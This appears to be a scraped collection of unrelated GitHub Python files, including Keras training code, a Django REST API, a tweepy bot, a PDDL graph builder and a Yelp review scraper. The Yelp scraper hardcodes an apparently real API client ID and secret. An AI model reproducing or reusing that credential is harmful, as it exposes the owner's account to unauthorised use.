activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(500, activation=tf.nn.relu))\n model.add(Dense(800, activation=tf.nn.relu))\n model.add(Dense(nn, activation='linear'))\n return model\n\n\n\ndef 
My_Custom_Generator_TS(inp_filename, out_filename, num_samples, inp_dim, out_dim, batch_size):\n    \"\"\"On-the-fly data Generator for the training process (random-read).\"\"\"\n    inputs = []\n    targets = []\n    batchcount = 0\n    indices = np.arange(num_samples)\n    np.random.shuffle(indices)\n    x = np.memmap(inp_filename, dtype='float32', mode='r', shape=(num_samples, inp_dim), offset=0)\n    y = np.memmap(out_filename, dtype='float32', mode='r', shape=(num_samples, out_dim), offset=0)\n    while True:\n        for line in indices:\n            \"\"\"if FW_or_BW:\n                linee = transform_ind_BW_to_FW(line)\n            else:\"\"\"\n            linee = line\n            inputs.append([x[linee, :]])\n            targets.append([y[linee, :]])\n            batchcount += 1\n            if batchcount >= batch_size:  # '>' here yielded batch_size + 1 samples per batch\n                batch_x = np.array(inputs, dtype='float32')\n                batch_y = np.array(targets, dtype='float32')\n                yield (batch_x, batch_y)\n                inputs = []\n                targets = []\n                batchcount = 0\n\n\n# Setting the parameters\nenv = env_pool.tora()\n\nX_range = env.X_range  # state-space\nU_range = env.U_range  # input space\nsample_time = env.sample_time  # sampling time in seconds\neta_x = env.eta_x  # state-space discretization size\neta_u = env.eta_u  # input-space discretization size\nshift_no = env.shift_no  # shifting the index vectors to avoid negative values\n# parallelization parameters\nlength = env.length\nnum_tasks_per_step = env.num_tasks_per_step\n# learning related settings\nepochs_TS = env.epochs_TS\nbatch_size_TS = env.batch_size_TS\nlearning_rate = env.learning_rate\n# defining filenames for saving the transition system\nforw_inp_TS_filename = env.forw_inp_TS_filename\nforw_out_TS_filename = env.forw_out_TS_filename\nback_inp_TS_filename = env.back_inp_TS_filename\nback_out_TS_filename = env.back_out_TS_filename\n\n# defining paths for saving the trained NNs\ncheckpoint_path_TS_forw = env.checkpoint_path_TS_forw\ncheckpoint_path_TS_back = env.checkpoint_path_TS_back\n\n\n\n\n\n# Extract descriptive parameters of the system\nrr_x = eta_x / 2  # radius of the partitions in the state-space\nrr_u = eta_u / 2  # radius of the partitions in the input-space\ndim_x = np.shape(X_range)[0]  # dimension of the state-space\ndim_u = np.shape(U_range)[0]  # dimension of the input-space\ndiscrete_sys_size = discrete_sys_size_gen(X_range)  # vector containing number of discrete points along each dimension in the\ndiscrete_inp_size = discrete_sys_size[dim_x:dim_x+dim_u]\nstate_space_size = discrete_sys_size[0:dim_x]\n\n\n# state and input spaces\nnum_dis_states = np.prod(discrete_sys_size[0:dim_x]).astype(int)  # size of the state-space\nnum_dis_inputs = np.prod(discrete_sys_size[dim_x:dim_x + dim_u]).astype(int)  # size of the input-space\nnum_state_inp_pairs = np.prod(discrete_sys_size).astype(int)  # number of state-input pairs\nnn = 2 * (np.sum(discrete_sys_size[0:dim_x])+3*shift_no*dim_x)  # dimension of the vector at the output of the trained NN\n\n# Training using TF 2.x\nnum_batches_TS = int(np.ceil(np.prod(discrete_sys_size).astype(int) / batch_size_TS))\n\n# Compile the model\nNN_TS_forw = NN_structure_TS()\nNN_TS_back = NN_structure_TS()\n# Training using TF 2.x\nlr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n    learning_rate,\n    decay_steps=math.ceil(num_state_inp_pairs/num_batches_TS),\n    decay_rate=.999,\n    staircase=True)\nNN_TS_forw.compile(loss='mean_squared_error',\n                   optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate/10, beta_1=.999, beta_2=.99999, name='Adam'),\n                   metrics=['mean_squared_error'])\nNN_TS_back.compile(loss='mean_squared_error',\n                   optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate/10, beta_1=.999, beta_2=.99999, name='Adam'),\n                   metrics=['mean_squared_error'])\n\n# using the lm method for curve fitting\n\"\"\"x_train = np.memmap(forw_inp_TS_filename, dtype='float32', mode='r', shape=(num_state_inp_pairs, dim_x+dim_u), offset=0)\ny_train = np.memmap(forw_out_TS_filename, dtype='float32', mode='r', shape=(num_state_inp_pairs, nn), offset=0)\n\ntrain_dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))\ntrain_dataset = train_dataset.shuffle(num_state_inp_pairs)\ntrain_dataset = train_dataset.batch(batch_size_TS).cache()\ntrain_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\nmodel = NN_structure_TS()\nmodel.summary()\nmodel_wrapper = lm.ModelWrapper(\n    tf.keras.models.clone_model(model))\nmodel_wrapper.compile(\n    optimizer=tf.keras.optimizers.SGD(learning_rate=learning_rate),\n    loss=lm.MeanSquaredError())\nhistory1 = model_wrapper.fit(train_dataset, epochs=epochs_TS)\"\"\"\n# Create a callback that saves the model's weights\ncp_callback_TS_forw = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path_TS_forw,\n                                                 save_weights_only=True,\n                                                 verbose=1)\ncp_callback_TS_back = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path_TS_back,\n                                                 save_weights_only=True,\n                                                 verbose=1)\n\n\n# Fit data to models using data written on disk + save the trained models\nstart = time.time()\n\n\"\"\"history1 = NN_TS_forw.fit(My_Custom_Generator_TS(forw_inp_TS_filename, forw_out_TS_filename, num_state_inp_pairs, dim_x+dim_u, nn, batch_size_TS),\n          steps_per_epoch=num_batches_TS, epochs=epochs_TS, verbose=1, validation_split=0, callbacks=[cp_callback_TS_forw])\nprint(\"Execution time for FW training\", time.time() - start)\"\"\"\nhistory2 = NN_TS_back.fit(My_Custom_Generator_TS(back_inp_TS_filename, back_out_TS_filename, num_state_inp_pairs, dim_x+dim_u, nn, batch_size_TS),\n          steps_per_epoch=num_batches_TS, epochs=epochs_TS, verbose=1, validation_split=0, callbacks=[cp_callback_TS_back])\nprint(\"Execution time for FW+BW training\", time.time() - start)\nprint(\"Execution time for full training\", time.time() - start)","repo_name":"msalamati/Neural-Representation","sub_path":"classification-based-synthesis-model-based/training_model_based.py","file_name":"training_model_based.py","file_ext":"py","file_size_in_byte":7860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"31207742715","text":"import pygame, sys\nfrom settings import *\nfrom level import Level\n\n# Pygame setup\npygame.init()\nscreen = pygame.display.set_mode((screen_width, screen_height), pygame.RESIZABLE)\nclock = pygame.time.Clock()\nlevel = Level(level_data)\n\nwhile True:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT or pygame.key.get_pressed()[pygame.K_q]:\n            pygame.quit()\n            sys.exit()\n\n    screen.fill(\"black\")\n    level.run()\n\n    pygame.display.update()\n    clock.tick(60)\n","repo_name":"B33th0v3n960/mario-clone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"4098143294","text":"#use of the requests module in python\n#importing the requests module\nimport requests\n\n#declaring a url and sending a GET request to it\nr = requests.get(\"https://requests.readthedocs.io/en/latest/\")\nprint(r.text) #printing the response text, which is the HTML of the page we requested\n\nurl = \"www.somthing.com\"\ndata = {\n    \"p1\": 4,\n    \"p2\": 8,\n}\nr2 = requests.post(url = url, data = data)\n\n#For more information, search the documentation of the requests module\n\n\n\n\n\n\n\n\n","repo_name":"yapranav09v/python-Tutorial","sub_path":"#5after oops python/UseRequestModule.py","file_name":"UseRequestModule.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
+{"seq_id":"2935016814","text":"# just an example\n# adapt it in each script\n\nimport numpy as np\nimport keras.backend as K\nfrom keras import Model\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras.optimizers import SGD\n\ndef get_model(base_model, num_class):\n    # build a classification head on top of a pre-trained base model\n    print(base_model.summary())\n    x = base_model.get_layer(\"bn\").output\n    # x = base_model.get_layer(\"block5_pool\").output\n\n    x = GlobalAveragePooling2D()(x)\n    predictions = Dense(num_class, activation='softmax')(x)\n\n    model = Model(inputs=base_model.input, outputs=predictions)\n\n    sgd = SGD(lr=1e-3, decay=1e-6, momentum=0.9, nesterov=True)\n    model.compile(loss='categorical_crossentropy',\n                  optimizer='adam',\n                  metrics=['accuracy'])\n    return model\n\n# base_model and num_class are expected to be defined by the importing script\nmodel = get_model(base_model, num_class)\n\n# learning_phase=1 keeps dropout active, so repeated forward passes differ\nf = K.function([model.layers[0].input, K.learning_phase()],\n               [model.layers[-1].output])\n\ndef predict_with_uncertainty(f, x, n_iter=10):\n    result = None\n\n    for it in range(n_iter):\n        out = f([x, 1])[0]  # backend functions take a list of inputs and return a list of outputs\n        if result is None:\n            result = np.zeros((n_iter,) + out.shape)\n        result[it] = out\n\n    prediction = result.mean(axis=0)\n    uncertainty = result.var(axis=0)\n    return prediction, uncertainty","repo_name":"OsciiArt/Cookpad","sub_path":"predict_with_uncertainty.py","file_name":"predict_with_uncertainty.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"36884056904","text":"try:\r\n    import plotly.graph_objects as grob\r\n    import yfinance\r\nexcept ModuleNotFoundError:\r\n    import os\r\n    os.system(\"pip install plotly\")\r\n    os.system(\"pip install yfinance\")\r\n    import plotly.graph_objects as grob  # retry the imports now that the packages are installed\r\n    import yfinance\r\n\r\nstock = yfinance.Ticker('MSFT')\r\npast = stock.history(period = '1y')\r\n\r\nplot = grob.Figure(data = grob.Scatter(x=past.index,y=past['Close'], mode='lines'))\r\nplot.show()","repo_name":"Wanderer0074348/Single_File_Projects","sub_path":"Stock_Trendline.py","file_name":"Stock_Trendline.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"73879606841","text":"\nfrom django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom users.views import UserViewSet, UserLogIn\n\nrouter = DefaultRouter()\nrouter.register(r'users', UserViewSet)\n\nurlpatterns = [\n    path('users/login/', UserLogIn.as_view()),\n    path('', include(router.urls)),\n    path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n] ","repo_name":"dev-muhammad/Django-course","sub_path":"my_project/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"}
+{"seq_id":"6609306711","text":"import random\n# import pandas as pd, numpy as np\nimport requests\nimport json\nimport time\nfrom picker import ipHandler\nfrom picker import config\n\ndef pickPlace():\n    # declare an array of places to choose from\n    all_places = []\n    keywords = ['restaurant']\n    api_key = config.api_key\n    radius = '1000'\n    coordinates = ipHandler.get_location() # obtain coords from ip addr\n    city = ipHandler.get_city()\n    print('Searching {0} within radius {1}...'.format(city, radius))\n    # print(coordinates)\n\n    for keyword in keywords:\n        url = 'https://maps.googleapis.com/maps/api/place/nearbysearch/json?location='+coordinates+'&radius='+str(radius)+'&keyword='+str(keyword)+'&key='+str(api_key)\n        while(True):\n            # print(url)\n            respon = requests.get(url)\n            jj = json.loads(respon.text)\n            results = jj['results']\n            for result in results:\n                name = result['name']\n                place_id = result['place_id']\n                lat = result['geometry']['location']['lat']\n                lng = result['geometry']['location']['lng']\n                rating = result['rating']\n                types = result['types']\n                vicinity = result['vicinity']\n                place = [name, place_id, lat, lng, rating, types, vicinity]\n                all_places.append(place)\n\n            if 'next_page_token' not in jj:\n                break\n            else:\n                next_page_token = jj['next_page_token']\n                url = 'https://maps.googleapis.com/maps/api/place/nearbysearch/json?key='+str(api_key)+'&pagetoken='+str(next_page_token)\n                continue\n    labels = ['Place Name', 'Place ID', 'Latitude', 'Longitude', 'Rating', 'Types', 'Vicinity']\n    #        [     0           1           2           3           4         5         6    ]\n    \n    # code that exports data to csv file if needed\n    # export_dataframe_1_medium = pd.DataFrame.from_records(all_places, columns=labels)\n    # export_dataframe_1_medium.to_csv('export_dataframe_1_medium.csv')\n    \n    x = 0\n    y = len(all_places) - 1\n    random_index = random.randint(x,y)\n\n    name = all_places[random_index][0]\n    rating = all_places[random_index][4]\n    address = all_places[random_index][6]\n    time.sleep(3)\n    # print('I suggest \"{0}\" with a rating of {1} at \"{2}\"'.format(name, rating, address))\n    return \"I suggest \" + str(name) + \" with a rating of \" + str(rating) + \" at \" + str(address)\n\n\ndef hello():\n    print('Hello from place picker!')","repo_name":"Marcusk19/Place-Picker","sub_path":"picker/src/picker/placePicker.py","file_name":"placePicker.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"18874283637","text":"# Baekjoon: Card 2\nfrom collections import deque  # use the deque queue structure from collections\n\nn=int(input())\nqueue = deque([i for i in range(1,n+1)])  # build a queue of 1..n\ni=1\nwhile len(queue)>1:  # repeat while the queue holds more than one card\n    if i%2==1:  # odd step\n        queue.popleft()  # discard the front element\n        i+=1\n    else:  # even step\n        queue.append(queue[0])  # move the front element to the back\n        queue.popleft()  # remove the front element\n        i+=1\nprint(queue[0])\n","repo_name":"world970511/study","sub_path":"Python-study/bj/card2.py","file_name":"card2.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"71334574201","text":"from ..models import Article, Community\nfrom ..serializer import ArticleSerializer\nfrom ..serializer import CommunityArticlesSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nfrom django.http import Http404\nfrom rest_framework.response import Response\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.permissions import AllowAny\n\n\nclass ArticleList(APIView):\n    authentication_classes = []\n    permission_classes = [AllowAny, ]\n    # list articles\n\n    def get(self, request, format=None):\n        article = Article.objects.all()\n        serializer = ArticleSerializer(article, many=True)\n        return Response(serializer.data)\n\n    # create a post\n    def post(self, request, format=None):\n        serializer = ArticleSerializer(data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data, status=status.HTTP_201_CREATED)\n        
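        # (added note) DRF's is_valid() collects any field errors on
        # serializer.errors, so the fallback below can hand them straight
        # back to the client with a 400 status.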
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ArticleDetail(APIView):\n def get_object(self, pk):\n try:\n return Article.objects.get(pk=pk)\n except Article.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n snippet = self.get_object(pk)\n serializer = ArticleSerializer(snippet)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n snippet = self.get_object(pk)\n serializer = ArticleSerializer(snippet, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n snippet = self.get_object(pk)\n snippet.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass CommunityArticleList(APIView):\n authentication_classes = []\n permission_classes = [AllowAny, ]\n\n def get(self, request, community_id, *args, **kwargs):\n communities = get_object_or_404(Community, pk=community_id)\n serializer = CommunityArticlesSerializer(communities)\n return Response(\n serializer.data,\n )\n","repo_name":"jphacks/F_2204","sub_path":"backend/rest_api/views/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30278062658","text":"import tweepy\nimport config\n\n# client = tweepy.Client(consumer_key=config.API_KEY,\n# consumer_secret=config.API_SECRET,\n# access_token=config.ACCESS_TOKEN,\n# access_token_secret=config.ACCESS_TOKEN_SECRET)\n\n# response = client.create_tweet()\n\ndef api():\n auth = tweepy.OAuthHandler(config.API_KEY, config.API_SECRET)\n auth.set_access_token(config.ACCESS_TOKEN, config.ACCESS_TOKEN_SECRET)\n\n return tweepy.API(auth)\n\ndef tweet(api: tweepy.API, message: str):\n api.update_status(message)\n print('Tweet success!')\n\n# define a function that will ping the CalTrans api and then pull the road conditions\n\napi = api()\n# tweet(api, 'E&J tweeting from Python!') -- the initial test to tweet from python\n\n# import in tweetpy\n# https://www.youtube.com/watch?v=2UBcRiddwAo <-- use this vid\n\n# import in the keys in a file that will be ignored on git pushes\n\n\n# create an Oauth with the access tokens and secrets\n\n# define a tweet function that will invoke tweet posts-- \n\n# have proper authorization for the access tokens to be able to read write and dm management\n","repo_name":"jemzir/soCal-snowBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"22233012259","text":"import os\nimport networkx as nx\n\nTRANSLATION = { 'adjacent': 'connected to', 'at': \"located in\", 'had': 'had',\n 'in': \"located in\", 'has': 'has', 'burried': 'buried'}\n\ndef getNodes(domain, problem):\n pr = False\n objects = {}\n\n d = open(domain)\n for line in d:\n if line.strip().startswith(\"(:constants\"): pr = True\n if pr:\n prline = line.strip().replace(\"(:constants \", \"\").strip(')')\n prline = prline.split()\n t = False\n wl = []\n for i in prline:\n if t == True:\n type = i\n elif i == '-':\n t = True\n else:\n wl.append(i)\n objects[type] = wl\n if pr and ')' in line: pr = False\n d.close()\n\n p = open(problem)\n for line in p:\n if line.strip().startswith(\"(:objects\"): pr = True\n if pr:\n prline = line.strip().replace(\"(:objects \", 
\"\").strip(')')\n            prline = prline.split()\n            t = False\n            wl = []\n            for i in prline:\n                if t == True:\n                    type = i\n                elif i == '-':\n                    t = True\n                else:\n                    wl.append(i)\n            if type in objects: objects[type] += wl\n            else: objects[type] = wl\n        if pr and ')' in line: pr = False\n    p.close()\n\n    return objects\n\ndef makeRelations(problem, graph):\n    #the relation names are:\n    #\"at\" character to location\n    #\"adjacent\" location to location\n    #\"has\" item to character\n    #\"in\" item to location\n    pr = False\n    p = open(problem)\n    for line in p:\n        if line.strip().startswith(\"(:init\"): pr = True\n        if pr:\n            prline=line.strip().replace(\"(:init \", \"\").strip(\"()\")\n            prline=prline.split()\n            if len(prline) == 0:\n                break\n            relation = prline[0]\n            if relation.startswith(':'): pr = False\n            if len(prline) > 1 and relation in TRANSLATION.keys():\n                i1, i2 = prline[1],prline[2]\n                e = (i1, i2, {\"label\": 'has'})\n                l = TRANSLATION[relation]\n                if not (l == 'had' and (graph.has_edge(*e[:2]))):\n                    graph.add_edge(i1, i2, label = TRANSLATION[relation])\n            if len(prline) == 1:\n                graph.add_nodes_from([relation], type='statement', fillcolor = \"red\", style = 'filled')\n    p.close()\n    return graph\n\ndef makeNodes(objects):\n    graph = nx.Graph()\n    graph.add_nodes_from(objects[\"room\"], type='location', fillcolor=\"yellow\", style=\"filled\")\n    graph.add_nodes_from(objects[\"item\"], type='object', fillcolor=\"white\", style=\"filled\")\n    graph.add_nodes_from(objects[\"character\"], type='character', fillcolor=\"orange\", style=\"filled\")\n\n    return graph\n\ndef getWG( problem = 'tests/door-problem.pddl',\n            domain = 'tests/door-domain.pddl',\n            output = 'log/graph.dot'):\n    objects = getNodes(domain, problem)\n    g = makeNodes(objects)\n    g = makeRelations(problem, g)\n\n    nx.nx_pydot.write_dot(g, output)\n\nif __name__ == \"__main__\":  # fixed: was \"main\", which never matches\n    objects = getNodes(\"door-domain.pddl\", \"door-problem-output.pddl\")\n    print(objects)\n    g = makeNodes(objects)\n    g = makeRelations(\"door-problem-output.pddl\", g)\n\n    nx.nx_pydot.write_dot(g, \"door.dot\")\n","repo_name":"sammo4gun/DungeonRunner","sub_path":"BardStep/WStoWG.py","file_name":"WStoWG.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"30311077026","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThe code below is adapted from the Yelp Fusion API code sample.\n\nThis program demonstrates the capability of the Yelp Fusion API\nby using the Search API to query for businesses by a search term and location,\nand the Business API to query additional information about the top result\nfrom the search query.\n\nPlease refer to http://www.yelp.com/developers/v3/documentation for the API\ndocumentation.\n\"\"\"\nfrom __future__ import print_function\n\nimport argparse\nimport json\nimport pprint\nimport requests\nimport sys\nimport urllib\nimport pandas\nimport time\nimport numpy as np\nimport datetime\nimport csv\nimport pandas as pd\n\n\n# This client code can run on Python 2.x or 3.x. 
Your imports can be\n# simpler if you only need one of those.\ntry:\n # For Python 3.0 and later\n from urllib.error import HTTPError\n from urllib.parse import quote\n from urllib.parse import urlencode\nexcept ImportError:\n # Fall back to Python 2's urllib2 and urllib\n from urllib2 import HTTPError\n from urllib import quote\n from urllib import urlencode\n\n\n# OAuth credential placeholders that must be filled in by users.\n# You can find them on\n# https://www.yelp.com/developers/v3/manage_app\nCLIENT_ID = \"2Slx3F97ZFV4IU3uImzXaw\"\nCLIENT_SECRET = \"9F6P1Y3SZRdHg1gYMZMxEJQLjer2TUI6IMe1wAEFbTLW6wxi2gNGcuubT1s8NyyA\"\n\n\n# API constants, you shouldn't have to change these.\nAPI_HOST = 'https://api.yelp.com'\nSEARCH_PATH = '/v3/businesses/search'\nBUSINESS_PATH = '/v3/businesses/' # Business ID will come after slash.\nTOKEN_PATH = '/oauth2/token'\nGRANT_TYPE = 'client_credentials'\n\n\n# Defaults for our simple example.\nDEFAULT_TERM = 'restaurant'\nDEFAULT_LOCATION = 'Houston, TX'\nSEARCH_LIMIT = 50\nOFFSET = 0\n\n# list to save all json results.\nl=[]\n\n# load review given known business ids.\nbtable = pd.read_csv(\"d:/my_env/bcsdineout/data/business_table2017-09-14 21-44-00.756000.csv\",\n sep=',')\nBU = btable['Restaurant_id']\n\n\ndef obtain_bearer_token(host, path):\n \"\"\"Given a bearer token, send a GET request to the API.\n\n Args:\n host (str): The domain host of the API.\n path (str): The path of the API after the domain.\n url_params (dict): An optional set of query parameters in the request.\n\n Returns:\n str: OAuth bearer token, obtained using client_id and client_secret.\n\n Raises:\n HTTPError: An error occurs from the HTTP request.\n \"\"\"\n url = '{0}{1}'.format(host, quote(path.encode('utf8')))\n assert CLIENT_ID, \"Please supply your client_id.\"\n assert CLIENT_SECRET, \"Please supply your client_secret.\"\n data = urlencode({\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET,\n 'grant_type': GRANT_TYPE,\n })\n headers = {\n 'content-type': 'application/x-www-form-urlencoded',\n }\n response = requests.request('POST', url, data=data, headers=headers)\n bearer_token = response.json()['access_token']\n return bearer_token\n\n\ndef request(host, path, bearer_token, url_params=None):\n \"\"\"Given a bearer token, send a GET request to the API.\n\n Args:\n host (str): The domain host of the API.\n path (str): The path of the API after the domain.\n bearer_token (str): OAuth bearer token, obtained using client_id and client_secret.\n url_params (dict): An optional set of query parameters in the request.\n\n Returns:\n dict: The JSON response from the request.\n\n Raises:\n HTTPError: An error occurs from the HTTP request.\n \"\"\"\n url_params = url_params or {}\n url = '{0}{1}'.format(host, quote(path.encode('utf8')))\n headers = {\n 'Authorization': 'Bearer %s' % bearer_token,\n }\n\n print(u'Querying {0} ...'.format(url))\n\n response = requests.request('GET', url, headers=headers, params=url_params)\n\n return response.json()\n\n\ndef search(bearer_token, term, location):\n \"\"\"Query the Search API by a search term and location.\n\n Args:\n term (str): The search term passed to the API.\n location (str): The search location passed to the API.\n\n Returns:\n dict: The JSON response from the request.\n \"\"\"\n\n url_params = {\n 'term': term.replace(' ', '+'),\n 'location': location.replace(' ', '+'),\n 'limit': SEARCH_LIMIT,\n 'offset': OFFSET\n }\n return request(API_HOST, SEARCH_PATH, bearer_token, url_params=url_params)\n\n\ndef 
get_business(bearer_token, business_id):\n \"\"\"Query the Business API by a business ID.\n\n Args:\n business_id (str): The ID of the business to query.\n\n Returns:\n dict: The JSON response from the request.\n \"\"\"\n business_path = BUSINESS_PATH + business_id\n\n return request(API_HOST, business_path, bearer_token)\n\ndef get_business_review(bearer_token, business_id):\n \"\"\"Query the Review API by a business ID.\n\n Args:\n business_id (str): The ID of the business to query.\n\n Returns:\n dict: The JSON response from the request.\n \"\"\"\n review_path = BUSINESS_PATH + business_id + '/reviews'\n\n return request(API_HOST, review_path, bearer_token)\n\n\ndef query_api(term, location):\n \"\"\"Queries the API by the input values from the user.\n\n Args:\n term (str): The search term to query.\n location (str): The location of the business to query.\n \"\"\"\n bearer_token = obtain_bearer_token(API_HOST, TOKEN_PATH)\n\n response = search(bearer_token, term, location)\n \n# Below is an example to load business from standard Yelp API.\n\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'No businesses for {0} in {1} found.'.format(term, location))\n return\n\n for b in businesses: \n business_id = b['id']\n \n \n # this part is to get business details.\n print(u'{0} businesses found, querying business info ' \\\n 'for the top result \"{1}\" ...'.format(\n len(businesses), business_id))\n response = get_business(bearer_token, business_id)\n l.append(response)\n\n # This part is to get review details. \n\n print(u'{0} businesses found, querying review info ' \\\n 'for the top result \"{1}\" ...'.format(\n len(businesses), business_id))\n response = get_business_review(bearer_token, business_id)\n temp = business_id +\",\"+str(response)\n l.append(temp)\n\ndef query_api_business(business_id):\n bearer_token = obtain_bearer_token(API_HOST, TOKEN_PATH)\n \n \"\"\"Queries the API by the input values from the user.\n\n Args:\n term (str): The search term to query.\n location (str): The location of the business to query.\n \"\"\"\n \n print(u'querying review info ' \\\n 'for the top result \"{0}\" ...'.format(\n business_id))\n response = get_business_review(bearer_token, business_id)\n temp = business_id +\",\"+str(response)\n l.append(temp)\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-q', '--term', dest='term', default=DEFAULT_TERM,\n type=str, help='Search term (default: %(default)s)')\nparser.add_argument('-l', '--location', dest='location',\n default=DEFAULT_LOCATION, type=str,\n help='Search location (default: %(default)s)')\n\ninput_values = parser.parse_args()\n\n# known issue: if the api returns till the end but the offset is still less than the limit,\n# it won't automatically break. You will need to manually interrupt. 
(To be fixed in the future)\n#while OFFSET < 1000:\n# try:\n# query_api(input_values.term, input_values.location)\n# except HTTPError as error:\n# sys.exit(\n# 'Encountered HTTP error {0} on {1}:\\n {2}\\nAbort program.'.format(\n# error.code,\n# error.url,\n# error.read(),\n# )\n# )\n# time.sleep(30.0)\n# OFFSET = OFFSET + 50\n\ncounter = 0\nfor b in BU: \n try:\n query_api_business(b)\n counter += 1\n if counter%50 == 0:\n time.sleep(30)\n except HTTPError as error:\n sys.exit(\n 'Encountered HTTP error {0} on {1}:\\n {2}\\nAbort program.'.format(\n error.code,\n error.url,\n error.read(),\n )\n )\n\n#save list (utf8 encoding)\ntoday = datetime.datetime.today()\noutputname = \"json_restaurant_review_\"+str(today).replace(':','-')+\".csv\"\nwith open(outputname, 'wb') as f:\n for item in l:\n f.write(item.encode('utf-8'))\n f.write(\"\\n\")","repo_name":"mekomlusa/bcsdineout","sub_path":"scripts/yelp_api_extract.py","file_name":"yelp_api_extract.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"27148013475","text":"# coding=utf-8\nfrom pytz import UTC\nfrom datetime import datetime\nfrom xml.sax.saxutils import escape as xml_escape\nfrom base64 import b64decode\nfrom zope.component import createObject\nfrom zope.component.interfaces import IFactory\nfrom zope.interface import implements, implementedBy\nfrom Products.CustomUserFolder.interfaces import IGSUserInfo\nfrom Products.CustomUserFolder.userinfo import userInfo_to_anchor\nfrom Products.GSAuditTrail import IAuditEvent, BasicAuditEvent, \\\n AuditQuery, event_id_from_data\nfrom Products.XWFCore.XWFUtils import munge_date\nfrom utils import profile_interface\n\nSUBSYSTEM = 'groupserver.ProfileAudit'\nimport logging\nlog = logging.getLogger(SUBSYSTEM) #@UndefinedVariable\n\nUNKNOWN = '0'\nSET_PASSWORD = '1'\nCHANGE_PROFILE = '2'\nREGISTER = '3'\nCREATE_USER = '4'\n# REQUEST_CONTACT = '5' # Now moved to gs.profile.contact\nclass ProfileAuditEventFactory(object):\n implements(IFactory)\n\n title=u'User Profile Audit-Event Factory'\n description=u'Creates a GroupServer audit event for profiles'\n\n def __call__(self, context, event_id, code, date,\n userInfo, instanceUserInfo, siteInfo, groupInfo = None,\n instanceDatum='', supplementaryDatum='', subsystem=''):\n\n if (code == SET_PASSWORD):\n event = SetPasswordEvent(context, event_id, date,\n userInfo, instanceUserInfo, siteInfo,\n instanceDatum, supplementaryDatum)\n elif (code == CHANGE_PROFILE):\n event = ChangeProfileEvent(context, event_id, date,\n userInfo, instanceUserInfo, siteInfo,\n instanceDatum, supplementaryDatum)\n elif (code == REGISTER):\n event = RegisterEvent(context, event_id, date,\n userInfo, instanceUserInfo, siteInfo,\n instanceDatum, supplementaryDatum)\n else:\n event = BasicAuditEvent(context, event_id, UNKNOWN, date,\n userInfo, instanceUserInfo, siteInfo, None,\n instanceDatum, supplementaryDatum, SUBSYSTEM)\n assert event\n return event\n\n def getInterfaces(self):\n return implementedBy(BasicAuditEvent)\n\nclass SetPasswordEvent(BasicAuditEvent):\n implements(IAuditEvent)\n\n def __init__(self, context, id, d, userInfo, instanceUserInfo,\n siteInfo, instanceDatum, supplementaryDatum):\n\n BasicAuditEvent.__init__(self, context, id,\n SET_PASSWORD, d, userInfo, instanceUserInfo,\n siteInfo, None, instanceDatum, supplementaryDatum,\n SUBSYSTEM)\n\n def __str__(self):\n retval = u'%s (%s) set password on %s (%s)' %\\\n (self.instanceUserInfo.name, 
